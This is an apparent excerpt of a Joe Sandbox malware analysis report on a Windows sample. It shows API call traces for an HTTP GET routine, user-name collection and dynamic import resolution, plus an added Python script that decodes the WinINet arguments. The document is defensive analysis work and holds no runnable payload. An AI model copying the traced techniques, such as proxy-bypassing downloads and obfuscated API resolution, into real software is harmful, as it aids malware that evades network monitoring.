                      • RtlAllocateHeap.NTDLL(00000000), ref: 0073460F
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0073479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007345C7, 007345D2, 007345DD, 007345E8, 007345F3, 00734617, 00734622, 0073462D, 00734638, 00734643, 00734657, 00734662, 0073466D, 00734678, 00734683, 007346AC, 007346B7, 007346C2, 007346CD, 007346D8, 00734713, 0073471E, 00734729, 00734734, 0073473F, 0073474F, 0073475A, 00734765, 00734770, 0073477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (this single sentence, repeated with $ separators about thirty times in the report's entry; a benign encyclopaedia-style sentence referenced that often from a heap-allocation and page-protection routine is best read as filler, not as data the routine works with)
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: dab7a31289c678a22fa56e72d79f7ac5d0c635fdb1547926db36e7907630c3ee
                      • Instruction ID: 7da24cf3aa1d11b3ea13b348db9a7eb88378d5e83a2bf8ce64f040d43ade0637
                      • Opcode Fuzzy Hash: dab7a31289c678a22fa56e72d79f7ac5d0c635fdb1547926db36e7907630c3ee
                      • Instruction Fuzzy Hash: AC4103B07F7744AAC628BBE4885EDFD76665F42706F595040AC04522DECAF8754CC922

                      Control-flow Graph

                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
                      • HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007363FD
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0073646D
                      • InternetCloseHandle.WININET(00000000), ref: 007364EF
                      • InternetCloseHandle.WININET(00000000), ref: 007364F9
                      • InternetCloseHandle.WININET(00000000), ref: 00736503
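The call list above fixes the meaning of several of the numeric arguments the sandbox recorded: the 00000001 access type passed to InternetOpenA, the 00000003 service in InternetConnectA, the 00400100 flags of HttpOpenRequestA, option 0000001F in InternetSetOptionA, info level 00000013 in HttpQueryInfoA and the 000007CF read size. The Python below is an added example, not part of the report or of the analysed sample: it parses trace lines of exactly this form and names those constants from the public wininet.h values. TRACE is copied from the list above and is the only input, so it runs offline.

```python
"""Decode the WinINet argument constants in a Joe Sandbox API trace.

Added example for reading the call list above; not part of the report or of
the analysed sample.  TRACE is copied from the report; the constant tables are
the public wininet.h values and are the only thing this block adds.
"""
import re
from dataclasses import dataclass

# Constructed input: the report's trace lines for the GET routine, bullets removed.
TRACE = """\
InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
StrCmpCA.SHLWAPI(?,013EE290), ref: 00736303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00736335
HttpOpenRequestA.WININET(00000000,GET,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00736385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007363BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007363D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 007363FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0073646D
InternetCloseHandle.WININET(00000000), ref: 007364EF
"""

# API.DLL(arg,...), ref: ADDR  -- nested calls carry a "Part of subcall function X: " prefix.
LINE_RE = re.compile(r"^(?:Part of subcall function [0-9A-Fa-f]{8}: )?"
                     r"(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$")

# Values from wininet.h.
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_FLAGS = {          # HttpOpenRequestA dwFlags bits
    0x80000000: "INTERNET_FLAG_RELOAD",           0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",           0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",            0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
                   6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {5: "HTTP_QUERY_CONTENT_LENGTH", 19: "HTTP_QUERY_STATUS_CODE",
              20: "HTTP_QUERY_STATUS_TEXT", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}
HTTP_QUERY_FLAG_NUMBER = 0x20000000   # modifier bit: return the header value as a DWORD


@dataclass
class Call:
    api: str
    dll: str
    args: list      # raw argument strings; "?" means the sandbox could not resolve it
    ref: int        # address of the call site


def parse_trace(text):
    """Parse report trace lines (leading bullets tolerated) into Call objects."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised trace line: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(m["api"], m["dll"], args, int(m["ref"], 16)))
    return calls


def hex_arg(call, index):
    """Numeric value of an argument, or None if it is '?' or a literal such as GET."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def flag_names(value, table):
    """Split a bit-mask into the names in table, highest bit first; unknown bits stay hex."""
    names, rest = [], value
    for bit, name in sorted(table.items(), reverse=True):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def decode(call):
    """Return {argument index: meaning} for the arguments whose meaning the API fixes."""
    out = {}
    if call.api == "InternetOpenA":
        v = hex_arg(call, 1); out[1] = INTERNET_OPEN_TYPE.get(v, f"access type {v}")
    elif call.api == "InternetConnectA":
        v = hex_arg(call, 5); out[5] = INTERNET_SERVICE.get(v, f"service {v}")
    elif call.api == "HttpOpenRequestA":
        out[1] = f"verb {call.args[1]}"
        out[6] = flag_names(hex_arg(call, 6) or 0, INTERNET_FLAGS)
    elif call.api == "InternetSetOptionA":
        v = hex_arg(call, 1); out[1] = INTERNET_OPTION.get(v, f"option {v}")
        out[3] = f"{hex_arg(call, 3)}-byte value"
    elif call.api == "HttpQueryInfoA":
        v = hex_arg(call, 1) or 0
        name = HTTP_QUERY.get(v & 0xFFFF, f"info level {v & 0xFFFF}")
        out[1] = name + (" | HTTP_QUERY_FLAG_NUMBER" if v & HTTP_QUERY_FLAG_NUMBER else "")
    elif call.api == "InternetReadFile":
        out[2] = f"{hex_arg(call, 2)}-byte read buffer"
    return out


def decode_trace(text):
    """Map call-site address -> (api, decoded arguments) for every line in the trace."""
    return {c.ref: (c.api, decode(c)) for c in parse_trace(text)}


if __name__ == "__main__":
    for ref, (api, meaning) in decode_trace(TRACE).items():
        print(f"{ref:08X} {api:<20} {meaning}")
```

Run stand-alone it prints one decoded line per call site. The flags on HttpOpenRequestA decode to INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, option 31 is INTERNET_OPTION_SECURITY_FLAGS (the 4-byte value written to it is the one argument the analyzer left as ?, so which certificate checks, if any, it relaxes cannot be read from this trace), level 19 is HTTP_QUERY_STATUS_CODE, and the response is read in 1999-byte chunks. Access type 1 (INTERNET_OPEN_TYPE_DIRECT) means the sample bypasses the user's configured proxy, which matters when proxy logs are the only network visibility you have.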
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                      • String ID: ERROR$ERROR$GET
                      • API String ID: 3749127164-2509457195
                      • Opcode ID: 3f6b3a868f510be72aba3f0dbb41893e2b6d89802a2fb8202b64e3a6a1ef4eef
                      • Instruction ID: 457cc17c6f8fdcafd44b5d1a77931676667fbf6758abb1eb4c519170c449d6e8
                      • Opcode Fuzzy Hash: 3f6b3a868f510be72aba3f0dbb41893e2b6d89802a2fb8202b64e3a6a1ef4eef
                      • Instruction Fuzzy Hash: 25717F71A50218FBEB24DFA0CC49BEE77B8FB44701F108198F5096B191DBB86A85CF52
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007311B7), ref: 00747880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00747887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0074789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
                      • Instruction ID: 0fc1000819bb2c733b4fe4b34115e5f1dd076d559b116801c8553f402dc48a1b
                      • Opcode Fuzzy Hash: 216afa4244accb8a1f47522f1df92c8607f07c20e087751880ca1875272c3b3e
                      • Instruction Fuzzy Hash: C1F044F2D44208AFC714DF94DD45BAEBBB8E744711F100159F605A2680C7781544CBA2
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
                      • Instruction ID: 09195dc73ec229a4b12212fc03d04d0ab56f39862070adf723894c03b26f29e3
                      • Opcode Fuzzy Hash: 49d313d44bdc2cc21f704a16cf74ab56d5b65dbe10c873b569877466a4f9e48d
                      • Instruction Fuzzy Hash: ACD05E75D0430CDBCB04DFE0D8496DDBBB8FB48312F000554D90962340EA3058C2CAA6

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 749c10-749c1a 634 74a036-74a0ca LoadLibraryA * 8 633->634 635 749c20-74a031 GetProcAddress * 43 633->635 636 74a146-74a14d 634->636 637 74a0cc-74a141 GetProcAddress * 5 634->637 635->634 638 74a216-74a21d 636->638 639 74a153-74a211 GetProcAddress * 8 636->639 637->636 640 74a21f-74a293 GetProcAddress * 5 638->640 641 74a298-74a29f 638->641 639->638 640->641 642 74a2a5-74a332 GetProcAddress * 6 641->642 643 74a337-74a33e 641->643 642->643 644 74a344-74a41a GetProcAddress * 9 643->644 645 74a41f-74a426 643->645 644->645 646 74a4a2-74a4a9 645->646 647 74a428-74a49d GetProcAddress * 5 645->647 648 74a4dc-74a4e3 646->648 649 74a4ab-74a4d7 GetProcAddress * 2 646->649 647->646 650 74a515-74a51c 648->650 651 74a4e5-74a510 GetProcAddress * 2 648->651 649->648 652 74a612-74a619 650->652 653 74a522-74a60d GetProcAddress * 10 650->653 651->650 654 74a67d-74a684 652->654 655 74a61b-74a678 GetProcAddress * 4 652->655 653->652 656 74a686-74a699 GetProcAddress 654->656 657 74a69e-74a6a5 654->657 655->654 656->657 658 74a6a7-74a703 GetProcAddress * 4 657->658 659 74a708-74a709 657->659 658->659
                      APIs
                      • GetProcAddress.KERNEL32(75900000,013D69C0), ref: 00749C2D
                      • GetProcAddress.KERNEL32(75900000,013D6680), ref: 00749C45
                      • GetProcAddress.KERNEL32(75900000,013E8FA0), ref: 00749C5E
                      • GetProcAddress.KERNEL32(75900000,013E8F28), ref: 00749C76
                      • GetProcAddress.KERNEL32(75900000,013EC930), ref: 00749C8E
                      • GetProcAddress.KERNEL32(75900000,013ECAC8), ref: 00749CA7
                      • GetProcAddress.KERNEL32(75900000,013DAFA0), ref: 00749CBF
                      • GetProcAddress.KERNEL32(75900000,013EC828), ref: 00749CD7
                      • GetProcAddress.KERNEL32(75900000,013EC9F0), ref: 00749CF0
                      • GetProcAddress.KERNEL32(75900000,013ECA80), ref: 00749D08
                      • GetProcAddress.KERNEL32(75900000,013EC978), ref: 00749D20
                      • GetProcAddress.KERNEL32(75900000,013D6760), ref: 00749D39
                      • GetProcAddress.KERNEL32(75900000,013D6780), ref: 00749D51
                      • GetProcAddress.KERNEL32(75900000,013D67A0), ref: 00749D69
                      • GetProcAddress.KERNEL32(75900000,013D67C0), ref: 00749D82
                      • GetProcAddress.KERNEL32(75900000,013EC810), ref: 00749D9A
                      • GetProcAddress.KERNEL32(75900000,013EC9C0), ref: 00749DB2
                      • GetProcAddress.KERNEL32(75900000,013DB0B8), ref: 00749DCB
                      • GetProcAddress.KERNEL32(75900000,013D67E0), ref: 00749DE3
                      • GetProcAddress.KERNEL32(75900000,013ECA98), ref: 00749DFB
                      • GetProcAddress.KERNEL32(75900000,013EC918), ref: 00749E14
                      • GetProcAddress.KERNEL32(75900000,013EC948), ref: 00749E2C
                      • GetProcAddress.KERNEL32(75900000,013EC8A0), ref: 00749E44
                      • GetProcAddress.KERNEL32(75900000,013D6800), ref: 00749E5D
                      • GetProcAddress.KERNEL32(75900000,013ECA38), ref: 00749E75
                      • GetProcAddress.KERNEL32(75900000,013ECAB0), ref: 00749E8D
                      • GetProcAddress.KERNEL32(75900000,013EC8B8), ref: 00749EA6
                      • GetProcAddress.KERNEL32(75900000,013EC840), ref: 00749EBE
                      • GetProcAddress.KERNEL32(75900000,013EC960), ref: 00749ED6
                      • GetProcAddress.KERNEL32(75900000,013EC858), ref: 00749EEF
                      • GetProcAddress.KERNEL32(75900000,013ECA50), ref: 00749F07
                      • GetProcAddress.KERNEL32(75900000,013EC990), ref: 00749F1F
                      • GetProcAddress.KERNEL32(75900000,013EC9D8), ref: 00749F38
                      • GetProcAddress.KERNEL32(75900000,013E9EA8), ref: 00749F50
                      • GetProcAddress.KERNEL32(75900000,013ECA08), ref: 00749F68
                      • GetProcAddress.KERNEL32(75900000,013EC8E8), ref: 00749F81
                      • GetProcAddress.KERNEL32(75900000,013D6820), ref: 00749F99
                      • GetProcAddress.KERNEL32(75900000,013EC9A8), ref: 00749FB1
                      • GetProcAddress.KERNEL32(75900000,013D6840), ref: 00749FCA
                      • GetProcAddress.KERNEL32(75900000,013ECAE0), ref: 00749FE2
                      • GetProcAddress.KERNEL32(75900000,013ECA68), ref: 00749FFA
                      • GetProcAddress.KERNEL32(75900000,013D6520), ref: 0074A013
                      • GetProcAddress.KERNEL32(75900000,013D6340), ref: 0074A02B
                      • LoadLibraryA.KERNEL32(013ECA20,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A03D
                      • LoadLibraryA.KERNEL32(013ECAF8,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A04E
                      • LoadLibraryA.KERNEL32(013EC870,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A060
                      • LoadLibraryA.KERNEL32(013EC888,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A072
                      • LoadLibraryA.KERNEL32(013EC8D0,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A083
                      • LoadLibraryA.KERNEL32(013EC900,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A095
                      • LoadLibraryA.KERNEL32(013ECCA8,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A0A7
                      • LoadLibraryA.KERNEL32(013ECB58,?,00745CA3,00750AEB,?,?,?,?,?,?,?,?,?,?,00750AEA,00750AE3), ref: 0074A0B8
                      • GetProcAddress.KERNEL32(75FD0000,013D64A0), ref: 0074A0DA
                      • GetProcAddress.KERNEL32(75FD0000,013ECCD8), ref: 0074A0F2
                      • GetProcAddress.KERNEL32(75FD0000,013E8810), ref: 0074A10A
                      • GetProcAddress.KERNEL32(75FD0000,013ECDB0), ref: 0074A123
                      • GetProcAddress.KERNEL32(75FD0000,013D6280), ref: 0074A13B
                      • GetProcAddress.KERNEL32(734B0000,013DB310), ref: 0074A160
                      • GetProcAddress.KERNEL32(734B0000,013D6320), ref: 0074A179
                      • GetProcAddress.KERNEL32(734B0000,013DB108), ref: 0074A191
                      • GetProcAddress.KERNEL32(734B0000,013ECC90), ref: 0074A1A9
                      • GetProcAddress.KERNEL32(734B0000,013ECCF0), ref: 0074A1C2
                      • GetProcAddress.KERNEL32(734B0000,013D64C0), ref: 0074A1DA
                      • GetProcAddress.KERNEL32(734B0000,013D63E0), ref: 0074A1F2
                      • GetProcAddress.KERNEL32(734B0000,013ECD50), ref: 0074A20B
                      • GetProcAddress.KERNEL32(763B0000,013D6360), ref: 0074A22C
                      • GetProcAddress.KERNEL32(763B0000,013D6380), ref: 0074A244
                      • GetProcAddress.KERNEL32(763B0000,013ECB88), ref: 0074A25D
                      • GetProcAddress.KERNEL32(763B0000,013ECC78), ref: 0074A275
                      • GetProcAddress.KERNEL32(763B0000,013D65E0), ref: 0074A28D
                      • GetProcAddress.KERNEL32(750F0000,013DB0E0), ref: 0074A2B3
                      • GetProcAddress.KERNEL32(750F0000,013DAEB0), ref: 0074A2CB
                      • GetProcAddress.KERNEL32(750F0000,013ECD08), ref: 0074A2E3
                      • GetProcAddress.KERNEL32(750F0000,013D64E0), ref: 0074A2FC
                      • GetProcAddress.KERNEL32(750F0000,013D6300), ref: 0074A314
                      • GetProcAddress.KERNEL32(750F0000,013DAED8), ref: 0074A32C
                      • GetProcAddress.KERNEL32(75A50000,013ECC00), ref: 0074A352
                      • GetProcAddress.KERNEL32(75A50000,013D6600), ref: 0074A36A
                      • GetProcAddress.KERNEL32(75A50000,013E88D0), ref: 0074A382
                      • GetProcAddress.KERNEL32(75A50000,013ECCC0), ref: 0074A39B
                      • GetProcAddress.KERNEL32(75A50000,013ECD20), ref: 0074A3B3
                      • GetProcAddress.KERNEL32(75A50000,013D6560), ref: 0074A3CB
                      • GetProcAddress.KERNEL32(75A50000,013D63A0), ref: 0074A3E4
                      • GetProcAddress.KERNEL32(75A50000,013ECD38), ref: 0074A3FC
                      • GetProcAddress.KERNEL32(75A50000,013ECDC8), ref: 0074A414
                      • GetProcAddress.KERNEL32(75070000,013D6480), ref: 0074A436
                      • GetProcAddress.KERNEL32(75070000,013ECD68), ref: 0074A44E
                      • GetProcAddress.KERNEL32(75070000,013ECDE0), ref: 0074A466
                      • GetProcAddress.KERNEL32(75070000,013ECC18), ref: 0074A47F
                      • GetProcAddress.KERNEL32(75070000,013ECD80), ref: 0074A497
                      • GetProcAddress.KERNEL32(74E50000,013D6400), ref: 0074A4B8
                      • GetProcAddress.KERNEL32(74E50000,013D6580), ref: 0074A4D1
                      • GetProcAddress.KERNEL32(75320000,013D62A0), ref: 0074A4F2
                      • GetProcAddress.KERNEL32(75320000,013ECBB8), ref: 0074A50A
                      • GetProcAddress.KERNEL32(6F060000,013D6540), ref: 0074A530
                      • GetProcAddress.KERNEL32(6F060000,013D6500), ref: 0074A548
                      • GetProcAddress.KERNEL32(6F060000,013D65A0), ref: 0074A560
                      • GetProcAddress.KERNEL32(6F060000,013ECB28), ref: 0074A579
                      • GetProcAddress.KERNEL32(6F060000,013D6420), ref: 0074A591
                      • GetProcAddress.KERNEL32(6F060000,013D6660), ref: 0074A5A9
                      • GetProcAddress.KERNEL32(6F060000,013D6440), ref: 0074A5C2
                      • GetProcAddress.KERNEL32(6F060000,013D65C0), ref: 0074A5DA
                      • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0074A5F1
                      • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0074A607
                      • GetProcAddress.KERNEL32(74E00000,013ECD98), ref: 0074A629
                      • GetProcAddress.KERNEL32(74E00000,013E8980), ref: 0074A641
                      • GetProcAddress.KERNEL32(74E00000,013ECDF8), ref: 0074A659
                      • GetProcAddress.KERNEL32(74E00000,013ECB10), ref: 0074A672
                      • GetProcAddress.KERNEL32(74DF0000,013D6620), ref: 0074A693
                      • GetProcAddress.KERNEL32(6E320000,013ECB40), ref: 0074A6B4
                      • GetProcAddress.KERNEL32(6E320000,013D6640), ref: 0074A6CD
                      • GetProcAddress.KERNEL32(6E320000,013ECC30), ref: 0074A6E5
                      • GetProcAddress.KERNEL32(6E320000,013ECB70), ref: 0074A6FD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: HttpQueryInfoA$InternetSetOptionA
                      • API String ID: 2238633743-1775429166
                      • Opcode ID: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
                      • Instruction ID: dd93013a2c9dee22fa6d5496fada8367318fc83867a585dff32fd54f26967be4
                      • Opcode Fuzzy Hash: e07f6d50b5a60fa50dfcc767db69598b2cb2bd425a5657a04d8a9f3b9988797c
                      • Instruction Fuzzy Hash: 10622DB792C200AFC348DFA8ED8999E37F9F7CC601B14451AA61DC3264D63994C1EB53

                      Control-flow Graph

                      block  address range   successors   calls
                      858    745510-745577   874          call 745ad0; call 74a820 * 3; call 74a740 * 4
                      874    74557c-745583   875, 876
                      875    745585-7455b6   891          call 74a820; call 74a7a0; call 731590; call 7451f0
                      891    7455bb-7455d2   902          call 74a8a0; call 74a800
                      876    7455d7-74564c   902, 906     call 74a740 * 2; call 731590; call 7452c0; call 74a8a0; call 74a800; call 74aad0; StrCmpCA
                      906    74564e-74568e   902          call 74a7a0; call 731590; call 7451f0; call 74a8a0; call 74a800
                      902    745693-7456a9   907, 908     call 74aad0; StrCmpCA
                      908    7456af-7456b6   910, 911
                      910    7456bc-7456c3   914, 915
